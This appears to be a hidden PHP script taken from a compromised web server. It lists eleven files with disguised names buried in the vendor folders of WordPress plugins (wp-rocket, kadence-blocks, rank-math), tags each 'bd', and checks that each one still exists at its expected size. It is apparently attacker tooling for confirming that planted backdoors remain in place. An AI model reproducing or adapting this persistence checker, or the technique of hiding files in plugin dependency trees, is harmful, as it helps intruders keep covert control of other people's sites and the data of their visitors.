Current File : //dev/shm/.pset
<?php   $r = '/home/vblioqus/fortunecoins.pro'; $x = ["/wp-content/plugins/wp-rocket/vendor/monolog/monolog/src/Monolog/Handler/FingersCrossed/edit.menu.item.php"=>"bd@@13582@@875",
"/wp-content/plugins/kadence-blocks-pro/vendor/vendor-prefixed/stellarwp/db/src/DB/QueryBuilder/Types/import_settings.php"=>"bd@@13336@@941",
"/wp-content/plugins/wp-rocket/inc/deprecated/Engine/Media/Embeds/3d_exhibits.php"=>"bd@@12844@@909",
"/wp-content/plugins/kadence-blocks/vendor/vendor-prefixed/symfony/http-foundation/Session/Storage/Handler/bridgemgr.php"=>"bd@@16954@@825",
"/wp-content/plugins/kadence-blocks/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/Auth/Token/Contracts/Token.Manager.php"=>"bd@@16708@@948",
"/wp-content/plugins/wp-rocket/inc/Engine/Optimization/RUCSS/Database/Queries/inifix.inc.php"=>"bd@@17243@@920",
"/wp-content/plugins/kadence-blocks/vendor/vendor-prefixed/phpoption/phpoption/src/PhpOption/cache_viewpro.php"=>"bd@@17522@@946",
"/wp-content/plugins/kadence-blocks/vendor/vendor-prefixed/stellarwp/telemetry/src/Telemetry/Opt_In/Opt.In.Template.php"=>"bd@@13942@@903",
"/wp-content/plugins/seo-by-rank-math/includes/modules/content-ai/blocks/command/assets/js/libmail.php"=>"bd@@13446@@868",
"/wp-content/plugins/kadence-blocks/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/Components/components.php"=>"bd@@13727@@806",
"/wp-content/plugins/kadence-blocks-pro/vendor/vendor-prefixed/stellarwp/db/src/DB/QueryBuilder/Clauses/blockedusers.php"=>"bd@@16860@@955"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');